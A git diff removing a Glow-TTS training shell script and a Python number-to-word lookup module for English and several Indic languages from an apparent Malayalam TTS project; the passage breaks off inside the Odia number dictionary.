b/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/scripts/glow/train_glow.sh deleted file mode 100644 index f12939d5d4563de555bf49408fa7a27397e0dae3..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/scripts/glow/train_glow.sh +++ /dev/null @@ -1,17 +0,0 @@ -#!/bin/bash - -gender='male' - -config='../../config/glow/'$gender'.json' -modeldir='../../checkpoints/glow/'$gender -logdir='../../logs/glow/'$gender -init=1 # 1 if start from scratch. 
0 if start from last checkpoint - - -#################################################### - -if [[ $init -eq 1 ]] -then - python ../../src/glow_tts/init.py -c $config -m $modeldir -l $logdir -fi -python ../../src/glow_tts/train.py -c $config -m $modeldir -l $logdir diff --git a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/utils/inference/num_to_word_on_sent.py b/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/utils/inference/num_to_word_on_sent.py deleted file mode 100644 index ce878a8c3ee6f5ef629abeaee418d5959f7179ed..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/utils/inference/num_to_word_on_sent.py +++ /dev/null @@ -1,1314 +0,0 @@ -import re -import string - -# ----------------------------- indic_num.py ----------------------------- -supported_lang = {"en", "hi", "gu", "mr", "bn", "te", "ta", "kn", "or", "pa"} -# supported_lang = {'eng', 'hin', 'guj', 'mar', 'ben', 'tel', 'tam', 'kan', 'ori', 'pan'} # Three alphabet lang code - -all_num = { - "en": ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"], - "hi": ["०", "१", "२", "३", "४", "५", "६", "७", "८", "९"], - "gu": ["૦", "૧", "૨", "૩", "૪", "૫", "૬", "૭", "૮", "૯"], - "mr": ["०", "१", "२", "३", "४", "५", "६", "७", "८", "९"], - "bn": ["০", "১", "২", "৩", "৪", "৫", "৬", "৭", "৮", "৯"], - "te": ["౦", "౧", "౨", "౩", "౪", "౫", "౬", "౭", "౮", "౯"], - "ta": ["0", "௧", "௨", "௩", "௪", "௫", "௬", "௭", "௮", "௯", "௰"], - "kn": ["೦", "೧", "೨", "೩", "೪", "೫", "೬", "೭", "೮", "೯"], - "or": ["୦", "୧", "୨", "୩", "୪", "୫", "୬", "୭", "୮", "୯"], - "pa": ["੦", "੧", "੨", "੩", "੪", "੫", "੬", "੭", "੮", "੯"], -} - -num_dict = dict() -num_dict["en"] = { - "0": "zero", - "1": "one", - "2": "two", - "3": "three", - "4": "four", - "5": "five", - "6": "six", - "7": "seven", - "8": "eight", - "9": "nine", - "10": "ten", - "11": "eleven", - "12": "twelve", - "13": "thirteen", - "14": "fourteen", - "15": "fifteen", - "16": "sixteen", - "17": "seventeen", - "18": "eighteen", - "19": "nineteen", - "20": "twenty", - "21": "twenty-one", - "22": "twenty-two", - "23": "twenty-three", - "24": "twenty-four", - "25": "twenty-five", - "26": "twenty-six", - "27": "twenty-seven", - "28": "twenty-eight", - "29": "twenty-nine", - "30": "thirty", - "31": "thirty-one", - "32": "thirty-two", - "33": "thirty-three", - "34": "thirty-four", - "35": "thirty-five", - "36": "thirty-six", - "37": "thirty-seven", - "38": "thirty-eight", - "39": "thirty-nine", - "40": "forty", - "41": "forty-one", - "42": "forty-two", - "43": "forty-three", - "44": "forty-four", - "45": "forty-five", - "46": "forty-six", - "47": "forty-seven", - "48": "forty-eight", - "49": "forty-nine", - "50": "fifty", - "51": "fifty-one", - "52": "fifty-two", - "53": "fifty-three", - "54": "fifty-four", - "55": "fifty-five", - "56": "fifty-six", - "57": "fifty-seven", - "58": "fifty-eight", - "59": "fifty-nine", - "60": "sixty", - "61": "sixty-one", - "62": "sixty-two", - "63": "sixty-three", - "64": "sixty-four", - "65": "sixty-five", - "66": "sixty-six", - "67": "sixty-seven", - "68": "sixty-eight", - "69": "sixty-nine", - "70": "seventy", - "71": "seventy-one", - "72": "seventy-two", - "73": "seventy-three", - "74": "seventy-four", - "75": "seventy-five", - "76": "seventy-six", - "77": "seventy-seven", - "78": "seventy-eight", - "79": "seventy-nine", - "80": "eighty", - "81": "eighty-one", - "82": "eighty-two", - "83": "eighty-three", - "84": "eighty-four", - "85": "eighty-five", - "86": "eighty-six", - "87": "eighty-seven", - "88": "eighty-eight", - "89": 
"eighty-nine", - "90": "ninety", - "91": "ninety-one", - "92": "ninety-two", - "93": "ninety-three", - "94": "ninety-four", - "95": "ninety-five", - "96": "ninety-six", - "97": "ninety-seven", - "98": "ninety-eight", - "99": "ninety-nine", - "100": "hundred", - "1000": "thousand", - "100000": "lac", - "10000000": "crore", - "1000000000": "arab", -} # English-India -num_dict["hi"] = { - "0": "शून्य", - "1": "एक", - "2": "दो", - "3": "तीन", - "4": "चार", - "5": "पाँच", - "6": "छः", - "7": "सात", - "8": "आठ", - "9": "नौ", - "10": "दस", - "11": "ग्यारह", - "12": "बारह", - "13": "तेरह", - "14": "चौदह", - "15": "पंद्रह", - "16": "सोलह", - "17": "सत्रह", - "18": "अट्ठारह", - "19": "उन्नीस", - "20": "बीस", - "21": "इक्कीस", - "22": "बाईस", - "23": "तेईस", - "24": "चौबिस", - "25": "पच्चीस", - "26": "छब्बीस", - "27": "सत्ताईस", - "28": "अट्ठाईस", - "29": "उनतीस", - "30": "तीस", - "31": "इकतीस", - "32": "बत्तीस", - "33": "तैंतीस", - "34": "चौंतीस", - "35": "पैंतीस", - "36": "छत्तीस", - "37": "सैंतीस", - "38": "अड़तीस", - "39": "उनतालीस", - "40": "चालीस", - "41": "इकतालीस", - "42": "बयालीस", - "43": "तैंतालीस", - "44": "चौंतालीस", - "45": "पैंतालीस", - "46": "छियालीस", - "47": "सैंतालीस", - "48": "अड़तालीस", - "49": "उनचास", - "50": "पचास", - "51": "इक्यावन​", - "52": "बावन", - "53": "तिरेपन", - "54": "चौवन", - "55": "पचपन", - "56": "छप्पन", - "57": "सत्तावन", - "58": "अट्ठावन", - "59": "उनसठ", - "60": "साठ", - "61": "इकसठ", - "62": "बासठ", - "63": "तिरेसठ", - "64": "चौंसठ", - "65": "पैंसठ", - "66": "छयासठ", - "67": "सरसठ​", - "68": "अड़सठ", - "69": "उनहत्तर", - "70": "सत्तर", - "71": "इकहत्तर", - "72": "बहत्तर", - "73": "तिहत्तर", - "74": "चौहत्तर", - "75": "पचहत्तर", - "76": "छिहत्तर", - "77": "सतहत्तर", - "78": "अठहत्तर", - "79": "उन्यासी", - "80": "अस्सी", - "81": "इक्यासी", - "82": "बयासी", - "83": "तिरासी", - "84": "चौरासी", - "85": "पचासी", - "86": "छियासी", - "87": "सत्तासी", - "88": "अठासी", - "89": "नवासी", - "90": "नब्बे", - "91": "इक्यानवे", - "92": "बानवे", - "93": "तिरानवे", - "94": "चौरानवे", - "95": "पचानवे", - "96": "छियानवे", - "97": "सत्तानवे", - "98": "अट्ठानवे", - "99": "निन्यानवे", - "100": "सौ", - "1000": "हज़ार", - "100000": "लाख", - "10000000": "करोड़", - "1000000000": "अरब", -} # Hindi -num_dict["gu"] = { - "0": "શૂન્ય", - "1": "એક", - "2": "બે", - "3": "ત્રણ", - "4": "ચાર", - "5": "પાંચ", - "6": "છ", - "7": "સાત", - "8": "આઠ", - "9": "નવ", - "10": "દસ", - "11": "અગિયાર", - "12": "બાર", - "13": "તેર", - "14": "ચૌદ", - "15": "પંદર", - "16": "સોળ", - "17": "સત્તર", - "18": "અઢાર", - "19": "ઓગણિસ", - "20": "વીસ", - "21": "એકવીસ", - "22": "બાવીસ", - "23": "તેવીસ", - "24": "ચોવીસ", - "25": "પચ્ચીસ", - "26": "છવીસ", - "27": "સત્તાવીસ", - "28": "અઠ્ઠાવીસ", - "29": "ઓગણત્રીસ", - "30": "ત્રીસ", - "31": "એકત્રીસ", - "32": "બત્રીસ", - "33": "તેત્રીસ", - "34": "ચોત્રીસ", - "35": "પાંત્રીસ", - "36": "છત્રીસ", - "37": "સડત્રીસ", - "38": "અડત્રીસ", - "39": "ઓગણચાલીસ", - "40": "ચાલીસ", - "41": "એકતાલીસ", - "42": "બેતાલીસ", - "43": "ત્રેતાલીસ", - "44": "ચુંમાલીસ", - "45": "પિસ્તાલીસ", - "46": "છેતાલીસ", - "47": "સુડતાલીસ", - "48": "અડતાલીસ", - "49": "ઓગણપચાસ", - "50": "પચાસ", - "51": "એકાવન", - "52": "બાવન", - "53": "ત્રેપન", - "54": "ચોપન", - "55": "પંચાવન", - "56": "છપ્પન", - "57": "સત્તાવન", - "58": "અઠ્ઠાવન", - "59": "ઓગણસાઠ", - "60": "સાઈઠ", - "61": "એકસઠ", - "62": "બાસઠ", - "63": "ત્રેસઠ", - "64": "ચોસઠ", - "65": "પાંસઠ", - "66": "છાસઠ", - "67": "સડસઠ", - "68": "અડસઠ", - "69": "અગણોસિત્તેર", - "70": "સિત્તેર", - "71": "એકોતેર", - "72": "બોતેર", - "73": "તોતેર", - "74": "ચુમોતેર", - 
"75": "પંચોતેર", - "76": "છોતેર", - "77": "સિત્યોતેર", - "78": "ઇઠ્યોતેર", - "79": "ઓગણાએંસી", - "80": "એંસી", - "81": "એક્યાસી", - "82": "બ્યાસી", - "83": "ત્યાસી", - "84": "ચોર્યાસી", - "85": "પંચાસી", - "86": "છ્યાસી", - "87": "સિત્યાસી", - "88": "ઈઠ્યાસી", - "89": "નેવ્યાસી", - "90": "નેવું", - "91": "એકાણું", - "92": "બાણું", - "93": "ત્રાણું", - "94": "ચોરાણું", - "95": "પંચાણું", - "96": "છન્નું", - "97": "સત્તાણું", - "98": "અઠ્ઠાણું", - "99": "નવ્વાણું", - "100": "સો", - "1000": "હજાર", - "100000": "લાખ", - "1000000": "દસ લાખ", - "10000000": "કરોડ઼", -} # Gujarati -num_dict["mr"] = { - "0": "शून्य", - "1": "एक", - "2": "दोन", - "3": "तीन", - "4": "चार", - "5": "पाच", - "6": "सहा", - "7": "सात", - "8": "आठ", - "9": "नऊ", - "10": "दहा", - "11": "अकरा", - "12": "बारा", - "13": "तेरा", - "14": "चौदा", - "15": "पंधरा", - "16": "सोळा", - "17": "सतरा", - "18": "अठरा", - "19": "एकोणीस", - "20": "वीस", - "21": "एकवीस", - "22": "बावीस", - "23": "तेवीस", - "24": "चोवीस", - "25": "पंचवीस", - "26": "सव्वीस", - "27": "सत्तावीस", - "28": "अठ्ठावीस", - "29": "एकोणतीस", - "30": "तीस", - "31": "एकतीस", - "32": "बत्तीस", - "33": "तेहेतीस", - "34": "चौतीस", - "35": "पस्तीस", - "36": "छत्तीस", - "37": "सदतीस", - "38": "अडतीस", - "39": "एकोणचाळीस", - "40": "चाळीस", - "41": "एक्केचाळीस", - "42": "बेचाळीस", - "43": "त्रेचाळीस", - "44": "चव्वेचाळीस", - "45": "पंचेचाळीस", - "46": "सेहेचाळीस", - "47": "सत्तेचाळीस", - "48": "अठ्ठेचाळीस", - "49": "एकोणपन्नास", - "50": "पन्नास", - "51": "एक्कावन्न", - "52": "बावन्न", - "53": "त्रेपन्न", - "54": "चोपन्न", - "55": "पंचावन्न", - "56": "छप्पन्न", - "57": "सत्तावन्न", - "58": "अठ्ठावन्न", - "59": "एकोणसाठ", - "60": "साठ", - "61": "एकसष्ठ", - "62": "बासष्ठ", - "63": "त्रेसष्ठ", - "64": "चौसष्ठ", - "65": "पासष्ठ", - "66": "सहासष्ठ", - "67": "सदुसष्ठ", - "68": "अडुसष्ठ", - "69": "एकोणसत्तर", - "70": "सत्तर", - "71": "एक्काहत्तर", - "72": "बाहत्तर", - "73": "त्र्याहत्तर", - "74": "चौर्‍याहत्तर", - "75": "पंच्याहत्तर", - "76": "शहात्तर", - "77": "सत्याहत्तर", - "78": "अठ्ठ्याहत्तर", - "79": "एकोण ऐंशी", - "80": "ऐंशी", - "81": "एक्क्याऐंशी", - "82": "ब्याऐंशी", - "83": "त्र्याऐंशी", - "84": "चौऱ्याऐंशी", - "85": "पंच्याऐंशी", - "86": "शहाऐंशी", - "87": "सत्त्याऐंशी", - "88": "अठ्ठ्याऐंशी", - "89": "एकोणनव्वद", - "90": "नव्वद", - "91": "एक्क्याण्णव", - "92": "ब्याण्णव", - "93": "त्र्याण्णव", - "94": "चौऱ्याण्णव", - "95": "पंच्याण्णव", - "96": "शहाण्णव", - "97": "सत्त्याण्णव", - "98": "अठ्ठ्याण्णव", - "99": "नव्व्याण्णव", - "100": "शे", - "1000": "हजार", - "100000": "लाख", - "10000000": "कोटी", - "1000000000": "अब्ज", -} # Marathi -num_dict["bn"] = { - "0": "শূন্য", - "1": "এক", - "2": "দুই", - "3": "তিন", - "4": "চার", - "5": "পাঁচ", - "6": "ছয়", - "7": "সাত", - "8": "আট", - "9": "নয়", - "10": "দশ", - "11": "এগার", - "12": "বার", - "13": "তের", - "14": "চৌদ্দ", - "15": "পনের", - "16": "ষোল", - "17": "সতের", - "18": "আঠার", - "19": "ঊনিশ", - "20": "বিশ", - "21": "একুশ", - "22": "বাইশ", - "23": "তেইশ", - "24": "চব্বিশ", - "25": "পঁচিশ", - "26": "ছাব্বিশ", - "27": "সাতাশ", - "28": "আঠাশ", - "29": "ঊনত্রিশ", - "30": "ত্রিশ", - "31": "একত্রিশ", - "32": "বত্রিশ", - "33": "তেত্রিশ", - "34": "চৌত্রিশ", - "35": "পঁয়ত্রিশ", - "36": "ছত্রিশ", - "37": "সাঁইত্রিশ", - "38": "আটত্রিশ", - "39": "ঊনচল্লিশ", - "40": "চল্লিশ", - "41": "একচল্লিশ", - "42": "বিয়াল্লিশ", - "43": "তেতাল্লিশ", - "44": "চুয়াল্লিশ", - "45": "পঁয়তাল্লিশ", - "46": "ছেচল্লিশ", - "47": "সাতচল্লিশ", - "48": "আটচল্লিশ", - "49": "ঊনপঞ্চাশ", - "50": "পঞ্চাশ", - "51": "একান্ন", - "52": "বায়ান্ন", - "53": 
"তিপ্পান্ন", - "54": "চুয়ান্ন", - "55": "পঞ্চান্ন", - "56": "ছাপ্পান্ন", - "57": "সাতান্ন", - "58": "আটান্ন", - "59": "ঊনষাট", - "60": "ষাট", - "61": "একষট্টি", - "62": "বাষট্টি", - "63": "তেষট্টি", - "64": "চৌষট্টি", - "65": "পঁয়ষট্টি", - "66": "ছেষট্টি", - "67": "সাতষট্টি", - "68": "আটষট্টি", - "69": "ঊনসত্তর", - "70": "সত্তর", - "71": "একাত্তর", - "72": "বাহাত্তর", - "73": "তিয়াত্তর", - "74": "চুয়াত্তর", - "75": "পঁচাত্তর", - "76": "ছিয়াত্তর", - "77": "সাতাত্তর", - "78": "আটাত্তর", - "79": "ঊনআশি", - "80": "আশি", - "81": "একাশি", - "82": "বিরাশি", - "83": "তিরাশি", - "84": "চুরাশি", - "85": "পঁচাশি", - "86": "ছিয়াশি", - "87": "সাতাশি", - "88": "আটাশি", - "89": "ঊননব্বই", - "90": "নব্বই", - "91": "একানব্বই", - "92": "বিরানব্বই", - "93": "তিরানব্বই", - "94": "চুরানব্বই", - "95": "পঁচানব্বই", - "96": "ছিয়ানব্বই", - "97": "সাতানব্বই", - "98": "আটানব্বই", - "99": "নিরানব্বই", - "100": "শো", - "1000": "হাজার", - "100000": "লাখ", - "10000000": "কোটি", - "1000000000": "একশ’ কোটি", -} # Bengali -num_dict["te"] = { - "0": "సున్నా", - "1": "ఒకటి", - "2": "రెండు", - "3": "మూడు", - "4": "నాలుగు", - "5": "ఐదు", - "6": "ఆరు", - "7": "ఏడు", - "8": "ఎనిమిది", - "9": "తొమ్మిది", - "10": "పది", - "11": "పదకొండు", - "12": "పన్నెండు", - "13": "పదమూడు", - "14": "పద్నాలుగు", - "15": "పదిహేను", - "16": "పదహారు", - "17": "పదిహేడు", - "18": "పద్దెనిమిది", - "19": "పందొమ్మిది", - "20": "ఇరవై", - "21": "ఇరవై ఒకటి", - "22": "ఇరవై రెండు", - "23": "ఇరవై మూడు", - "24": "ఇరవై నాలుగు", - "25": "ఇరవై ఐదు", - "26": "ఇరవై ఆరు", - "27": "ఇరవై ఏడు", - "28": "ఇరవై ఎనిమిది", - "29": "ఇరవై తొమ్మిది", - "30": "ముప్పై", - "31": "ముప్పై ఒకటి", - "32": "ముప్పై రెండు", - "33": "ముప్పై మూడు", - "34": "ముప్పై నాలుగు", - "35": "ముప్పై ఐదు", - "36": "ముప్పై ఆరు", - "37": "ముప్పై ఏడు", - "38": "ముప్పై ఎనిమిది", - "39": "ముప్పై తొమ్మిది", - "40": "నలభై", - "41": "నలభై ఒకటి", - "42": "నలభై రెండు", - "43": "నలభై మూడు", - "44": "నలభై నాలుగు", - "45": "నలభై ఐదు", - "46": "నలభై ఆరు", - "47": "నలభై ఏడు", - "48": "నలభై ఎనిమిది", - "49": "నలభై తొమ్మిది", - "50": "యాభై", - "51": "యాభై ఒకటి", - "52": "యాభై రెండు", - "53": "యాభై మూడు", - "54": "యాభై నాలుగు", - "55": "యాభై ఐదు", - "56": "యాభై ఆరు", - "57": "యాభై ఏడు", - "58": "యాభై ఎనిమిది", - "59": "యాభై తొమ్మిది", - "60": "అరవై", - "61": "అరవై ఒకటి", - "62": "అరవై రెండు", - "63": "అరవై మూడు", - "64": "అరవై నాలుగు", - "65": "అరవై ఐదు", - "66": "అరవై ఆరు", - "67": "అరవై ఏడు", - "68": "అరవై ఎనిమిది", - "69": "అరవై తొమ్మిది", - "70": "డెబ్బై", - "71": "డెబ్బై ఒకటి", - "72": "డెబ్బై రెండు", - "73": "డెబ్బై మూడు", - "74": "డెబ్బై నాలుగు", - "75": "డెబ్బై ఐదు", - "76": "డెబ్బై ఆరు", - "77": "డెబ్బై ఏడు", - "78": "డెబ్బై ఎనిమిది", - "79": "డెబ్బై తొమ్మిది", - "80": "ఎనభై", - "81": "ఎనభై ఒకటి", - "82": "ఎనభై రెండు", - "83": "ఎనభై మూడు", - "84": "ఎనభై నాలుగు", - "85": "ఎనభై ఐదు", - "86": "ఎనభై ఆరు", - "87": "ఎనభై ఏడు", - "88": "ఎనభై ఎనిమిది", - "89": "ఎనభై తొమ్మిది", - "90": "తొంభై", - "91": "తొంభై ఒకటి", - "92": "తొంభై రెండు", - "93": "తొంభై మూడు", - "94": "తొంభై నాలుగు", - "95": "తొంభై ఐదు", - "96": "తొంభై ఆరు", - "97": "తొంభై ఏడు", - "98": "తొంభై ఎనిమిది", - "99": "తొంభై తొమ్మిది", - "100": "వందల", - "1000": "వేల", - "100000": "లక్షల", - "10000000": "కోట్ల", - "1000000000": "బిలియన్", -} # Telugu -num_dict["ta"] = { - "0": "பூஜ்ஜியம்", - "1": "ஒன்று", - "2": "இரண்டு", - "3": "மூன்று", - "4": "நான்கு", - "5": "ஐந்து", - "6": "ஆறு", - "7": "ஏழு", - "8": "எட்டு", - "9": "ஒன்பது", - "10": "பத்து", - "11": "பதினொன்று", - "12": "பன்னிரண்டு", - "13": "பதிமூன்று", - "14": "பதினான்கு", - "15": "பதினைந்து", 
- "16": "பதினாறு", - "17": "பதினேழு", - "18": "பதினெட்டு", - "19": "பத்தொன்பது", - "20": "இருபது", - "21": "இருபது ஒன்று", - "22": "இருபத்து இரண்டு", - "23": "இருபத்து மூன்று", - "24": "இருபத்து நான்கு", - "25": "இருபத்து ஐந்து", - "26": "இருபத்து ஆறு", - "27": "இருபத்து ஏழு", - "28": "இருபத்து எட்டு", - "29": "இருபத்து ஒன்பது", - "30": "முப்பது", - "31": "முப்பத்து ஒன்று", - "32": "முப்பத்து இரண்டு", - "33": "முப்பத்து மூன்று", - "34": "முப்பத்து நான்கு", - "35": "முப்பத்து ஐந்து", - "36": "முப்பத்து ஆறு", - "37": "முப்பத்து ஏழு", - "38": "முப்பத்து எட்டு", - "39": "முப்பத்து ஒன்பது", - "40": "நாற்பது", - "41": "நாற்பத்து ஒன்று", - "42": "நாற்பத்து இரண்டு", - "43": "நாற்பத்து மூன்று", - "44": "நாற்பத்து நான்கு", - "45": "நாற்பத்து ஐந்து", - "46": "நாற்பத்து ஆறு", - "47": " நாற்பத்து ஏழு", - "48": "நாற்பத்து எட்டு", - "49": "நாற்பத்து ஒன்பது", - "50": "ஐம்பது", - "51": "ஐம்பத்து ஒன்று", - "52": "ஐம்பத்து இரண்டு", - "53": "ஐம்பத்து மூன்று", - "54": "ஐம்பத்து நான்கு", - "55": "ஐம்பத்து ஐந்து", - "56": "ஐம்பத்து ஆறு", - "57": "ஐம்பத்து ஏழு", - "58": "ஐம்பத்து எட்டு", - "59": "ஐம்பத்து ஒன்பது", - "60": "அறுபது", - "61": "அறுபத்து ஒன்று", - "62": "அறுபத்து இரண்டு", - "63": "அறுபத்து மூன்று", - "64": "அறுபத்து நான்கு", - "65": "அறுபத்து ஐந்து", - "66": "அறுபத்து ஆறு", - "67": "அறுபத்து ஏழு", - "68": "அறுபத்து எட்டு", - "69": "அறுபத்து ஒன்பது", - "70": "எழுபது", - "71": "எழுபத்தி ஒன்று", - "72": "எழுபத்தி இரண்டு", - "73": "எழுபத்தி முச்சக்கர", - "74": "எழுபத்தி நான்கு", - "75": "எழுபத்தி ஐந்து", - "76": "எழுபத்தி ஆறு", - "77": "எழுபத்தி ஏழு", - "78": "எழுபத்தி எட்டு", - "79": "எழுபத்தி ஒன்பது", - "80": "எண்பது", - "81": "எண்பத்தியொன்று", - "82": "எண்பத்திரண்டு", - "83": "எண்பத்திமூன்று", - "84": "என்பதினான்கு", - "85": "என்பதினைந்து", - "86": "எண்பத்திஆறு", - "87": "எண்பத்திஏழு", - "88": "எண்பத்தியெட்டு", - "89": "எண்பத்தியொன்பது", - "90": "தொன்னூறு", - "91": "தொண்ணூற்றியொன்று", - "92": "தொண்ணூற்றிரண்டு", - "93": "தொண்ணூற்றிமூன்று", - "94": "தொண்ணூற்றிநான்கு", - "95": "தொண்ணூற்றிஐந்து", - "96": "தொண்ணூற்றியாறு", - "97": "தொண்ணூற்றியேழு", - "98": "தொண்ணூற்றியெட்டு", - "99": "தொண்ணூற்றிஒன்பது", - "100": "நூறு", - "1000": "ஆயிரம்", - "100000": "இலட்சம்", - "10000000": "கோடி", - "1000000000": "பில்லியன்", -} # Tamil -num_dict["kn"] = { - "0": "ಸೊನ್ನೆ", - "1": "ಒಂದು", - "2": "ಎರಡು", - "3": "ಮೂರು", - "4": "ನಾಲ್ಕು", - "5": "ಅಯ್ದು", - "6": "ಆರು", - "7": "ಏಳು", - "8": "ಎಂಟು", - "9": "ಒಂಬತ್ತು", - "10": "ಹತ್ತು", - "11": "ಹನ್ನೊಂದು", - "12": "ಹನ್ನೆರಡು", - "13": "ಹದಿಮೂರು", - "14": "ಹದಿನಾಲ್ಕು", - "15": "ಹದಿನೈದು", - "16": "ಹದಿನಾರು", - "17": "ಹದಿನೇಳು", - "18": "ಹದಿನೆಂಟು", - "19": "ಹತ್ತೊಂಬತ್ತು", - "20": "ಇಪ್ಪತ್ತು", - "21": "ಇಪ್ಪತ್ತ್’ಒಂದು", - "22": "ಇಪ್ಪತ್ತ್’ಎರಡು", - "23": "ಇಪ್ಪತ್ತ್’ಮೂರು", - "24": "ಇಪ್ಪತ್ತ್’ನಾಲ್ಕು", - "25": "ಇಪ್ಪತ್ತ್’ಐದು", - "26": "ಇಪ್ಪತ್ತ್’ಆರು", - "27": "ಇಪ್ಪತ್ತ್’ಏಳು", - "28": "ಇಪ್ಪತ್ತ್’ಎಂಟು", - "29": "ಇಪ್ಪತ್ತ್’ಒಂಬತ್ತು", - "30": "ಮೂವತ್ತು", - "31": "ಮುವತ್ತ್’ಒಂದು", - "32": "ಮುವತ್ತ್’ಎರಡು", - "33": "ಮುವತ್ತ್’ಮೂರು", - "34": "ಮೂವತ್ತ್’ನಾಲ್ಕು", - "35": "ಮೂವತ್ತ್’ಐದು", - "36": "ಮೂವತ್ತ್’ಆರು", - "37": "ಮೂವತ್ತ್’ಏಳು", - "38": "ಮೂವತ್ತ್’ಎಂಟು", - "39": "ಮೂವತ್ತ್’ಒಂಬತ್ತು", - "40": "ನಲವತ್ತು", - "41": "ನಲವತ್ತೊಂದು", - "42": "ನಲವತ್ತ್ ಎರಡು", - "43": "ನಲವತ್ತ್ ಮೂರು", - "44": "ನಲವತ್ತ್ ನಾಲ್ಕು", - "45": "ನಲವತ್ತೈದು", - "46": "ನಲವತ್ತಾರು", - "47": "ನಲವತ್ತೇಳು", - "48": "ನಲವತ್ತೆಂಟು", - "49": "ನಲವತ್ತೊಂಬತ್ತು", - "50": "ಐವತ್ತು", - "51": "ಐವತ್ತೊಂದು", - "52": "ಐವತ್ತೆರಡು", - "53": "ಐವತ್ತಮೂರು", - "54": "ಐವತ್ತ್ನಾಲ್ಕು", - "55": "ಐವತ್ತೈದು", - "56": "ಐವತ್ತಾರು", - "57": "ಐವತ್ತೇಳು", - "58": "ಐವತ್ತೆಂಟು", - "59": "ಐವತ್ತೊಂಬತ್ತು", - "60": 
"ಅರವತ್ತು", - "61": "ಅರವತ್ತೊಂದು", - "62": "ಅರವತ್ತೆರಡು", - "63": "ಅರವತ್ತ್ ಮೂರು", - "64": "ಅರವತ್ತ್ ನಾಲ್ಕು", - "65": "ಅರವತ್ತೈದು", - "66": "ಅರವತ್ತಾರು", - "67": "ಅರವತ್ತೇಳು", - "68": "ಅರವತ್ತೆಂಟು", - "69": "ಅರವತ್ತೊಂಬತ್ತು", - "70": "ಎಪ್ಪತ್ತು", - "71": "ಎಪ್ಪತ್ತೊಂದು", - "72": "ಎಪ್ಪತ್ತೆರಡು", - "73": "ಎಪ್ಪತ್ತ್ ಮೂರು", - "74": "ಎಪ್ಪತ್ತ್ ನಾಲ್ಕು", - "75": "ಎಪ್ಪತ್ತೈದು", - "76": "ಎಪ್ಪತ್ತಾರು", - "77": "ಎಪ್ಪತ್ತೇಳು", - "78": "ಎಪ್ಪತ್ತೆಂಟು", - "79": "ಎಪ್ಪತ್ತೊಂಬತ್ತು", - "80": "ಎಂಬತ್ತು", - "81": "ಎಂಬತ್ತೊಂದು", - "82": "ಎಂಬತ್ತೆರಡು", - "83": "ಎಂಬತ್ತ್ ಮೂರು", - "84": "ಎಂಬತ್ತ್ ನಾಲ್ಕು", - "85": "ಎಂಬತ್ತೈದು", - "86": "ಎಂಬತ್ತಾರು", - "87": "ಎಂಬತ್ತೇಳು", - "88": "ಎಂಬತ್ತೆಂಟು", - "89": "ಎಂಬತ್ತೊಂಬತ್ತು", - "90": "ತೊಂಬತ್ತು", - "91": "ತೊಂಬತ್ತೊಂದು", - "92": "ತೊಂಬತ್ತೆರಡು", - "93": "ತೊಂಬತ್ತ ಮೂರು", - "94": "ತೊಂಬತ್ತ ನಾಲ್ಕು", - "95": "ತೊಂಬತ್ತೈದು", - "96": "ತೊಂಬತ್ತಾರು", - "97": "ತೊಂಬತ್ತೇಳು", - "98": "ತೊಂಬತ್ತೆಂಟು", - "99": "ತೊಂಬತ್ತೊಂಬತ್ತು", - "100": "ನೂರ", - "1000": "ಸಾವಿರದ", - "100000": "ಲಕ್ಷದ", - "10000000": "ಕೋಟಿ", - "1000000000": "ಶತಕೋಟಿ", -} # Kannada -num_dict["or"] = { - "0": "ଶୁନ୍ୟ", - "1": "ଏକ", - "2": "ଦୁଇ", - "3": "ତିନି", - "4": "ଚାରି", - "5": "ପାଞ୍ଚ", - "6": "ଛଅ", - "7": "ସାତ", - "8": "ଆଠ", - "9": "ନଅ", - "10": "ନଅ", - "11": "ଏଗାର", - "12": "ବାର", - "13": "ତେର", - "14": "ଚଉଦ", - "15": "ପନ୍ଦର", - "16": "ଷୋହଳ", - "17": "ସତର", - "18": "ଅଠର", - "19": "ଊଣାଇଶ", - "20": "କୋଡିଏ", - "21": "ଏକୋଇଶି", - "22": "ବାଇଶି", - "23": "ତେଇଶି", - "24": "ଚବିଶି", - "25": "ପଚିଶି", - "26": "ଛବିଶି", - "27": "ସତାଇଶି", - "28": "ଅଠାଇଶି", - "29": "ଅଣତିରିଶି", - "30": "ତିରିଶି", - "31": "ଏକତିରିଶି", - "32": "ବତିଶି", - "33": "ତେତିଶି", - "34": "ଚଉତିରିଶି", - "35": "ପଞ୍ଚତିରିଶି", - "36": "ଛତିଶି", - "37": "ସଂଇତିରିଶି", - "38": "ଅଠତିରିଶି", - "39": "ଅଣଚାଳିଶି", - "40": "ଚାଳିଶି", - "41": "ଏକଚାଳିଶି", - "42": "ବୟାଳିଶି", - "43": "ତେୟାଳିଶି", - "44": "ଚଉରାଳିଶି", - "45": "ପଞ୍ଚଚାଳିଶି", - "46": "ଛୟାଳିଶି", - "47": "ସତଚାଳିଶି", - "48": "ଅଠଚାଳିଶି", - "49": "ଅଣଚାଶ", - "50": "ପଚାଶ", - "51": "ଏକାବନ", - "52": "ବାଉନ", - "53": "ତେପନ", - "54": "ଚଉବନ", - "55": "ପଞ୍ଚାବନ", - "56": "ଛପନ", - "57": "ସତାବନ", - "58": "ଅଠାବନ", - "59": "ଅଣଷଠି", - "60": "ଷାଠିଏ", - "61": "ଏକଷଠି", - "62": "ବାଷଠି", - "63": "ତେଷଠି", - "64": "ଚଉଷଠି", - "65": "ପଞ୍ଚଷଠି", - "66": "ଛଅଷଠି", - "67": "ସତଷଠି", - "68": "ଅଠଷଠି", - "69": "ଅଣସ୍ତରୀ", - "70": "ସତୂରୀ", - "71": "ଏକସ୍ତରୀ", - "72": "ବାସ୍ତରୀ", - "73": "ତେସ୍ତରୀ", - "74": "ଚଉସ୍ତରୀ", - "75": "ପଞ୍ଚସ୍ତରୀ", - "76": "ଛଅସ୍ତରୀ", - "77": "ସତସ୍ତରୀ", - "78": "ଅଠସ୍ତରୀ", - "79": "ଅଣାଅଶୀ", - "80": "ଅଶୀ", - "81": "ଏକାଅଶୀ", - "82": "ବୟାଅଶୀ", - "83": "ତେୟାଅଶୀ", - "84": "ଚଉରାଅଶୀ", - "85": "ପଞ୍ଚାଅଶୀ", - "86": 